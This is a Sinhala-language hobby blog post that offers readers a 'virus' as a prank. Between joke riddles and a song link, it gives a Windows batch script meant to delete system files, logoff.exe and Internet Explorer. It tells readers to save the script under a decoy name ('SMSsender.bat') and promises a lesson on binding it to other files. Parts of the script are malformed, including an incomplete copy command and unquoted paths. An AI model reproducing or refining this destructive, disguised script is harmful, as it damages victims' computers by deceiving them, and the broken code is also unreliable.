Like us

Follow Us

Total Pageviews

සුභ නව වසරක් වේවා!

Mouse,Keyboard,Explore,Log off අවුල් කරන වයිරස් එකක් හදමු!

by Unknown  |  in Virus at  Saturday, February 01, 2014



කෝමද මල්ලිලා.. ක්ලාස් ගොහින් දැන් ඇවිත් බන්ඩිය එහෙම පුරවන් ඉදගත්තා විතරයි.ඊයෙත් පෝස්ට් දෙකක් දැම්මනේ.පෝස්ට් දාන්න ගියාම එක වැර දාන්න හිතෙනවා.නොදා ඉන්නකොට කොහෙද ඉතින් කම්මැලිනේ අප්පා. හරි මම අද කතන්දරයක් කියලා දෙන්නම් නෑ නෑ ප්‍රශ්න ටිකක් අහන්නම්.පුලුවන්නම් කමේන්ටුවකින් කියමුකෝ බලන්ට හ්ම්ම්.. ඔවු!!


1. කැලේ හදුන වැඩුන ටාසන්ට ඇයි රැවුලක් නැත්තේ???

2. දිය යටදී කෙනෙක්ට හඬන්න පුලුවන්ද???

3. මාළුවන්ට වතුර තිබහ හැදෙන්නේ නැද්ද???

4. ඇයි බිල්ඩිමක් දැනටමත් හදල ඉවර නම් එකට build "ing " කියන්නේ???

5. සල්ලි ගස් වල හැදෙන්නේ නැත්තම් බැංකු වල ශාකා තියෙන්නේ කොහොමද???

6. ඇයි රවුම් pizza හතරැස් පෙට්ටි වල එන්නේ???


 7. ඇයි ගම් ඒවා දාල තියෙන බෝතලේ නොඇලෙන්නේ???


8. I love you කියන්නේ ප්‍රශ්නයක් නෙමෙයි නම් ඇයි එකට පිළිතුරක් බලාපොරොත්තු වෙන්නේ???

9. පොල් තෙල් හදල තියෙන්නේ පොල් වලින් නම්, එළවලු තෙල් හදල තියෙන්නේ එළවලු වලින් නම්, Baby oil හදල තියෙන්නේ මොනවයින්ද???

 10.ඇයි කුරුල්ලන්ට ගහ උඩ නින්ද ගියාම බිම වැටෙන්නේ නැත්තේ???



හලි ඕකට පිලිතුරු දන්නවනම් කීලා යන්නකෝ.. හොදම හොද ඉදිච්ච බටු ගෙඩියක් දෙනවා කිවුවොත්. හ්ම්ම්... ආව කාරනේට බහිමුකෝ.. 

  මම අද ඇරන් ආවේ පරිගණකයේ Mouse,Keyboard,Explore,Computer Logoff වගේ පට්ට ආතල් එකක් දෙන්න පුලුවන් වයිරස් එකක්. මොකේකට හරි Bind කරලා දුන්නනම් කොහොමද ටොපිය.ඕ.. Bind කරන විදිහ ගැන කීලා දුන්නේ නෑනේ තාම නේද,හලි හලි ඒකත් කීලා දෙන්නම්.


@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe



ඔන්න උඩ තියෙන කෝඩ් එක Copy කරගෙන Notepad Open කරලා .bat විදිහට save කරගන්න.
 ex:-  SMSsender.bat

ඔන්න තීනවා බාන්ඩේ පෙන් එකක Auto Run වෙන්න එහෙම දාලා දෙන්න එපා ඈ.. හී.. පවුනේ!!!! අන්තිමට මම අපායේ යයිද මන්දා,,මෙවුවා කීලා දෙනවට.නෑ මේවා කීලා දෙන්නේ කාටවත් කරදරයක් කරන්න එහෙම නෙවේ.නෝටි වැඩ කරලා තිබුනොත් තලායි ඕන් මං.හලි ආතල් එකක් ඇරන් බලන්න.අනුන්ට කරදර කලොත් තමන්ම අමාරුවේ වැටෙයි හොදේ..

ආ මේ අදත් පස්ට සින්දුවක් තීනවා.අහලම යන්න http://www.music.lk/download-awasan-susum-final-breath-amplifierz-mp3



Listen to a preview

Texte alternatif

This is a low quality file for preview purposes. Quality of the file may be lower than original downloadable file. Download the Audio file and get the maximum quality audio.
Duration: 40 seconds / Bit Rate: 56 kbps

5 comments:

+++වැඩේ හොදයි කියලා හිතෙනවනම් ශේප් එකේ අදහසකුත් කොටලම යන්නකෝ..

Related Posts Plugin for WordPress, Blogger...
Proudly Powered by Blogger.